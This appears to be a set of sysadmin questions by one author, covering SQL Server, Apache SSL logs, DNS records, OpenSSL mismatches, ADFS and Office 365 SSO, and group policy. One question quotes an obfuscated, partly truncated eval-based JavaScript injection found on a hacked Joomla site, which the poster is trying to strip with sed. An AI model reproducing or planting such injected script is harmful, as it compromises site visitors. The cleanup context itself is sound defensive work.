We have a non-domain joined SQL 2012 server running in Azure supporting several web sites, earlier this week an issue popped up where domain joined computers could not log in. There were no updates or changes applied to the server, no login errors, fiddler showed no issues. The user accounts were able to login from outside the domain network.
I just configured the sites on my Windows Azure Hosted Ubuntu 12.04 Apache server to use SSL, the sites are working and redirecting correctly. Here is my virtual host configuration:
<VirtualHost *:80>
ServerName site1.company.com
Redirect permanent / https://site1.company.com/
</VirtualHost>
<VirtualHost *:443>
DocumentRoot /var/www/site1
ServerName site1.company.com
Options -Indexes
DirectoryIndex login.php
SSLEngine on
SSLCertificateFile /etc/apache2/certs/company.com.crt
SSLCertificateKeyFile /etc/apache2/certs/server1.key
SSLCertificateChainFile /etc/apache2/certs/gd_bundle.crt
</VirtualHost>
All virtual hosts are configured almost identically. However I'm seeing a LOT of entries in Apache's error log that has me worried about performance/issues during production.
[debug] ssl_engine_kernel.c(1866): OpenSSL: Handshake: start
[debug] ssl_engine_kernel.c(1874): OpenSSL: Loop: before/accept initialization
[debug] ssl_engine_io.c(1908): OpenSSL: I/O error, 11 bytes expected to read on BIO#7f8f746c6ae0 [mem: 7f8f746cc0d0]
[debug] ssl_engine_kernel.c(1903): OpenSSL: Exit: error in unknown state
[info] [client x.x.x.x] (70014)End of file found: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!]
[info] [client x.x.x.x.] Connection closed to child 5 with abortive shutdown (server site1.company.com:443)
[info] [client x.x.x.x] Connection to child 0 established (server site1.company.com:443)
[info] Seeding PRNG with 656 bytes of entropy
This loop repeats itself every 15 seconds. Have I misconfigured something? All sites work correctly without errors.
I have a several Windows Server 2008 R2 DC/DNS servers locally, RODC's at the remote office, and a Windows Server 2012 DC/DNS server on Azure with a VPN tunnel established.
Earlier today I moved a webserver, changed the DNS records on one of the local DNS servers, and updated at the registrar. Everything worked as expected.
Then weird issues started popping up, some people being directed to the wrong server, others to the correct one.
After troubleshooting, I checked the local DNS server again and the records were still correct, until I hit refresh, and the old A-Records popped up in conjunction with the new ones.
The way these records are set up, is a forward lookup zone with one static A record using the parent domain for each zone.
So there ended up being two A-Records with different IP's for the URL's that I had changed earlier in the day, and the old records showed back up in DNS manager when I refreshed the screen. (I had checked several times previously without refreshing)
Fortunately this only affected internal users and not all of them at that, all external users were unaffected because the public DNS records are published through a registrar (GoDaddy, independent so unrelated).
What happened? And how can I prevent this from happening again?
We have been working on developing several SharePoint sites as a POC using the evaluation versions of SharePoint 2013 and SQL Server 2008R2 Enterprise Evaluation. POC worked, went into limited production, well the SQL Server Evaluation expiration date snuck up on me and expired, so it's time to purchase ASAP.
Ideally because of the new price models, I want to use SQL Server 2012 Standard, licensed by processor.
Now the question is, can I do a in place upgrade from the expired SQL 2008R2 trial directly to SQL 2012 Standard?
Or better yet, export the sharepoint databases from the expired trial, so I can import them into a brand new SQL 2012 installation.
One of our old hosted Joomla sites suffered a JavaScript injection, and im going through cleaning it up. The following code was inserted into every .php or .js file:
<?
#0c0896#
echo " <script type=\"text/javascript\" language=\"javascript\" > bv=(5-3-1);aq=\"0\"+\"x\";sp=\"spli\"+\"t\";ff=String.fromCharCode;w=window;z=\"dy\";try{document[\"\x62o\"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,71,61,58,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1\"[sp](\",\");}w=f;s=[];for(i=2-2;-i+1333!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]))+0xa-bv);}za=e;za(s)}</script>";
#/0c0896#
?>
"exact syntax, though the actual code is MUCH longer, I cut a lot of hex from the middle to make it easier"
I am trying to use GREP and SED to do a find and replace on all files, and I don't think I have my syntax for SED quite right.
grep -rl "4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c" ./ | xargs sed -i 's/<?[.*]#0c0896#[.*]#\/0c0896#[.*]?>//g
What I am going for here is to use grep to search all files for a snippet of the code, which is working, and then use SED to replace the tags #0c0896# and everything in between with nothing.
We were recently forced to migrate our production cloud servers from GoDaddy to Azure because GoDaddy is ending thier cloud server service.
One of our servers was a CentOS 5.7 running a JasperReports Bitnami stack. During the migration process I upgrade all servers to the most recent distribution, and rebuilt Jasper from the Azure Bitnami Jasper image on Ubuntu 12.04LTS
A have the SSL Certificate installed on the JasperServer and working correctly
All the new servers are performing beautifully, now heres where the problem comes in.
We also have a dedicated CentOS 5.8 virtual server on GoDaddy which is staying there(for now), there are a collection of sites on said server which serve up reports from Jasper via Soap.
However it is getting handshake failures when attempting to connect
#openssl s_client -connect newjasperserver.com:443
CONNECTED(00000003)
9092:error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure:s23_clnt.c:583:
and:
#openssl version
OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
the new server is running:
#openssl version
OpenSSL 1.0.1c 10 May 2012
Now after a lot of research, it appears that there is an incompatibility between OpenSSL < 0.9.8k and OpenSSL 1.0.1.
The options I've identified are:
Migrate the server to a CentOS 6.4 server on Azure (Ideal, but politically difficult, dont ask why)
Upgrade the server in-place(Unsupported, and I don't want to try it on a production server)
Wipe the server and rebuild it with 6.4(possibility, though if I do that, I will force option 1)
Remove OpenSSL from the server and install a newer version (once again, something I'm not comfortable with on a production server)
Install a second instance of OpenSSL (my #2 option, but I'm unsure how to proceed)
Install an alternative to OpenSSL (havent even begun to look into this)
Disable enforced encryption on the Jasper Server and allow connection via http (this is looking like my best temporary fix until I can force that server to be migrated to Azure)
Are there any options I have missed? Is there a way on the Jasper side to allow connections from the older OpenSSL?
We have Ubuntu 11.10 server that is running a LAMP stack, it was set up before I got here and no one knows what its for. I have to migrate it, or just shut it down but I need to know what its doing first.
Digging through it, there are no sites hosted off of it however there several databases created in MySQL.
So it may be connected to one of our sites but none of the devs here know.
What I need to do is view connection history on the MySQL databases do that I can find what, if anything, is connecting to them.
I am monitoring the processlist and not seeing any active connections.
Can I use a single ADFS server for both office 365 and SharePoint SSO if they use different SSL's and domain names?
Enviroment consists of:
2 DC's -- ADFS Server -- ADFS Proxy -- Sharepoint 2010 Server (portal.companyname.com) -- hosted o365 (companynameMail.com)
o365 SSO is currently working flawlessly (after a LOT of work) I want to add SSO for our SharePoint server.
I'm unclear if its possible, and stuck at adding in a second SSL on the ADFS server.
(And yes, I will be adding redundent servers as time and budget permits)
One of our contractors just tried telling my boss that we should be using our Cisco ASA to serve DHCP instead of our DC... Is there any merit to this? Or is he just, once again, blowing smoke.
On shared folders on the file server, for the domain user name object under the security tab, the icon has a red x.
There are no symptoms, the users have full access, there is just a red x on the icon for their name.
Why is this?
For clarification, logged into the windows 2008 r2 file server, browse to a users shared folder, right click on the folder, hit properties, click the security tab. The object representing the users domain name has a little red x on the lower right hand corner of the icon that looks like a single man. There are no symptoms beyond me wondering why the red x is there.
update: it does not show the x when you look at permissions from a workstation, only on the file server
I have a user whos is unable to access the file server from his workstation, his user account can access it from other machines, I'm able to access it using my account on his computer.
I'm assuming its a corrupted local profile? Normally I would just remove and recreate the profile, but.. He's a developer with extensive settings stored into his programs, and it would take at least a day possibly two in order to recreate everything.
What I can I do short of rebuilding his profile?
I'm just trying to find what takes precedence in loading a GPO.
Specifically, will drives map prior to scripts running?
I have an .exe in a network share that I'm running every time a user logs in, and I dont know if I should load it via the mapped drive or through the network path.
I've actually found the solution, but I'm trying to understand why it failed, and why my solution fixed the problem.
We have an application that uses forms authentication between a web server and sql server, web server runs server 2008, sql server runs 2008 r2, and sql server 2008.
In august the sql server was patched with .net 3.5.1, the web server was untouched, and the forms authentication continued to work.
1 week ago we virtualized the web server onto our vSphere server because of failing hardware. Afterwards the form authentication failed with event code 4005, detail code 50201, The ticket supplied was invalid (on the sql server). In fact the sql server started generating Schannel errors and began blue screening 3-4 times a day.
At this point I touched the sql server for the first time(ever), the errors were non specific, any reference to them I could find had to do with either zone alarm(which we don't run), or memory errors. So I applied service pack 1, which stopped the blue screening, but did not fix the forms authentication.
At this point we had a work around, so we put it on the back burner while we completed another project, and I was able to get back on it last night.
First thing was to adjust some code in the webconfig file on the sql server, nothing, next was regenerate and change out the machine key, still no change. Update the DNS servers, no change.
Finally I went through and installed all windows updates, two reboots, (over RDP installed a network card driver which failed, and did not have my server room key, that was fun).
After that, forms authentication was working again. And the sql server stopped generating as many errors, I've gotten two schannel errors since then.
In short, forms authentication began failing when the web server was cloned onto a virtual machine, which caused the sql server to blue sceen? and forms authentication to fail. And could only be fixed by applying patches to the sql server?(I'm wishing I had patched the servers one at a time so I could know for sure which patch on which server fixed it).
My question is why did it fail, and why did patching fix it? I hate fixing something without fully understanding the why and how.
I need to add a site to trusted sites on all computers in my domain. I can do it with the "site to zone assignment list", however when I do, it locks trusted sites on the client computer "this setting is managed by your administrator". What I need is a way to add the site, make it persistant, and not affects the users ability to add trusted sites of thier own. (It's a development enviroment, sites are created and tested regularly, they need that ability.)
I am in the process of designing the group policies for my organization, and I'm wondering if there is somewhere I can go to look at templates, to see how other people have set theirs up, and even download templates to work off of.
I have ADFS and office 365 completely set up and configured for SSO, using an ADFS server and ADFS proxy.
For internal users, I have IIS configured on the adfs server to redirect companynamemail.com to http://Outlook.com/owa/companyname.com so that the users, instead of having to go through portal.microsoftonline.com, type in thier user name, click the link, and then login, they just go to companynamemail.com, and it performs the SSO
I'm trying to find a way for external users to have a similar expeirence, I know that they will have to login because they arent authenticated through the domain, but I want thier portal to be companynamemail.com. I tried using the adfs proxy to do the http redirect, but it forwards without allowing them to login and gives an error.
I'm thinking about writing the redirect into the default website, but I'm wondering if I can do it with a redirect or a/cname record.
I've been on the phone with microsoft for over an hour trying to get a straight answer from them, and if I was set up to test this myself right now I could find out.
I'm deploying o365 SSO in stages by OU, dir sync is performed every 3 hours. I need to do a sync right away.
Will 'start-onlinecoexistencesync' only sync those users that have already been federated, or will it force a federation of all users?
So I'm working on bringing my company into the 21'st century, with virtual servers, active directory, ADFS, SSO etc. Its a huuuuge project, with a future goal of ISO 27001 cerification.
The current question is, does the Direct Access role offered by Server 2012 perform the same role as Forefront Unified Access Gateway 2010 does?
I'm sure there are many differences, but my primary concerns are Sharepoint publishing, ADFS proxy, reverse proxy, remote connection, and o365 syncronization.
We are working on deploying ADFS for SSO with o365.
We have a consulting firm that handles our firewall configuration.
Today, while attempting to get them to set up a DMZ for me to install my ADFS proxy server, the consultent attempted to convinve me to just have them open up port 443 directly to the ADFS server, and to not use a proxy at all. He told me that such a configuration was standard practice now.
Because of the nature of our business, we have very stringent security requirements, including that no internal servers be opened up to the outside.
The question I have is, was he just blowing smoke because he was lazy and diddnt want to configure the DMZ, or does he have a legitimate point?
My company is in the process of rolling out Active Directory enterprise wide, with office 365 syncronization, Lync, Exchange, and Outlook.
We currently have no AD (yet); there are 400+ users in 5 separate offices.
The quandary we are facing is whether we should initially deploy Windows Server 2012, or 2008R2.
Certain elements are afraid of unknown issues with 2012, and one of our contractors suggested that we use 2008 because it has a larger knowledge base.
I've done all my testing in 2012, and I know that either one will work for our purposes. It's a fairly simple deployment (2 DCs and 1 ADFS server).
We will also be adding WDS, WSUS, Sharepoint, and WebHelpDesk.
Is there any valid technical reason that we should not go with the latest available version, assuming this is a complete description of the environment, or any caveat with Windows Server 2012 that we should be aware of?